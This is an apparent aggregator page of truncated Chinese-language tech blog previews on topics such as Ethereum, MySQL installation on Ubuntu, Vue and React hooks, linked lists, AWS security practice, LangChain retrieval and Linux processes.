以太坊(Ethereum)作为第二代区块链平台,其不仅仅是一部分布式账本,而是一个支持智能合约与去中心化应用(DApps)的全球计算机。其核心架构中,以太坊虚拟机(Ethereum Virtual Machine&…...
MySQL---Ubuntu环境安装
1.首先我们要安装MySQL的安装包(APT 配置包) 这个是适合我的Ubuntu版本的MySQL安装包 下载安装包(MySQL APT 配置包) wget https://dev.mysql.com/get/mysql-apt-config_0.8.17-1_all.deb2.安装 APT 配置包: sudo d…...
Vue 3 中 ref 与 reactive 的对比
Vue 3 中 ref 与 reactive 的对比 Vue 3 中 ref 与 reactive 的对比一、定义和基本使用refreactive 二、响应式原理refreactive 三、适用场景refreactive 四、注意事项refreactive Vue 3 中 ref 与 reactive 的对比 在 Vue 3 中,ref 和 reactive 都是用于创建响应式…...
【数据结构 · 初阶】- 单链表
目录 一.相关指针知识点 二.链表 1.为什么学了顺序表还要学链表 2.优点 三.实现 1.链表的打印 —— 理解链表结构 (2) 物理结构图 2.链表的尾插 —— 入门 错误写法:tail ! NULL 总结: 正确代码物理图解: (2) 尾插整体代码 (思考…...
【前端】【React】useCallback的作用与使用场景总结
一、useCallback 的作用与使用场景总结 useCallback 是 React 提供的一个 Hook,用于缓存函数的引用,避免因为组件重新渲染而导致函数地址发生变化。它返回一个记忆(memoized)后的回调函数,只有当依赖项发生变化时才会…...
什么是 React Router?如何使用?
React Router 详解 1. 引言 在现代 web 开发中,单页面应用(SPA)越来越流行,React 是构建 SPA 的热门库之一。React Router 是一个标准的路由库,专为 React 应用设计,允许开发者在应用中实现动态路由和 UR…...
jQuery 插件
在现代Web开发中,jQuery以其简洁的语法和强大的功能成为了前端开发者们喜爱的工具之一。为了进一步扩展jQuery的功能,社区贡献了大量的插件,使得开发者能够更加高效地实现各种复杂的交互效果和功能。本文将介绍什么是jQuery插件、如何编写自己…...
未来杭州:科技与茶香交织的生态诗篇
故事背景 故事发生在中国浙江杭州,融合智能科技与传统茶文化,描绘未来城市中人与自然共生的诗意画卷。通过六个充满未来感的生态场景,展现科技如何重塑龙井茶园、古运河、西湖等经典地标,编织出一曲科技与人文共鸣的生态交响诗。 …...
微服务多模块构建feign项目过程与一些报错(2025详细版)
目录 1.eureka-server的注意事项 2.eureka-feign的注意事项 3.多模块构建feign项目过程 3.1创建父项目 3.2创建子项目eureka-server 3.3创建子项目eureka-provider 3.4创建子项目eureka-feign 3.5运行 给个点赞谢谢 1.eureka-server的注意事项 eureka-server的yml文件…...
AWS云安全实践:基于CISA关键措施的检测与实施指南
1. 引言 随着越来越多的组织将其基础设施迁移到云端,确保AWS环境的安全变得至关重要。美国网络安全与基础设施安全局(CISA)提出的关键措施为我们提供了一个可靠的框架。本文将探讨如何在AWS环境中实施这些措施,特别关注检测类别和可实施的关键措施。 2. AWS云安全中的CISA关…...
超越肉眼所见:一种利用视网膜光学相干断层扫描血管成像(OCTA)图像进行早期痴呆检测的关联模型|文献速递-深度学习医疗AI最新文献
Title 题目 Beyond the eye: A relational model for early dementia detection using retinal OCTA images 超越肉眼所见:一种利用视网膜光学相干断层扫描血管成像(OCTA)图像进行早期痴呆检测的关联模型 01 文献速递介绍 阿尔茨海默病&…...
终端使用python出现segmentation fault (core dumped)的一种解法
有时候在终端输入python,希望交互式运行命令或者通过pdb调试,但是出现如下错误: [1] 7476 segmentation fault (core dumped) python 但是单独运行python xxx.py 或者 python -c "xxx" 又是可以的! 经过与AI大模…...
分布式id生成算法(雪花算法 VS 步长id生成)
分布式ID生成方案详解:雪花算法 vs 步长ID 一、核心需求 全局唯一性:集群中绝不重复有序性:有利于数据库索引性能高可用:每秒至少生成数万ID低延迟:生成耗时<1ms二、雪花算法(Snowflake) 1. 数据结构(64位) 0 | 0000000000 0000000000 0000000000 0000000000 0 |…...
h265为什么没有大范围应用
H.265(也称为 HEVC,High Efficiency Video Coding)是一种视频压缩标准,旨在提供比 H.264(AVC)更高的压缩效率。然而,尽管 H.265 在技术上具有许多优势,但其大范围应用受到了以下几个…...
Linux图形化界面
一、Linux图形化界面 桌面对于Linux系统来说,只是一个应用程序,所以是可以移植的。 Linaro公司针对于半导体厂商推出的芯片,开发了ARM开发工具、Linux内核以及Linux发行版(包括Android及Ubuntu)。 所以无需自己移植&am…...
LangChain-检索系统 (Retrieval)
检索系统 (Retrieval) 检索系统是LangChain的核心组件之一,它提供了从各种数据源获取相关信息的能力,是构建知识增强型应用的基础。本文档详细介绍LangChain检索系统的组件、工作原理和最佳实践。 概述 检索系统解决了大型语言模型知识有限和过时的问…...
【Linux】进程概念
目录 一、进程概念 (一)什么是进程 (二)描述进程-PCB 二、fork创建进程 (一)bash概念 (二)如何创建子进程 一、进程概念 (一)什么是进程 结论&#x…...
【JavaScript】十七、事件委托(冒泡阶段的利用)
文章目录 1、事件委托2、tab栏切换案例:使用事件委托优化3、阻止元素默认行为 1、事件委托 以送快递为例,某班有20名同学,每人有一个快递,快递员可以一个个送,需要送40次,很繁琐,换个方式&…...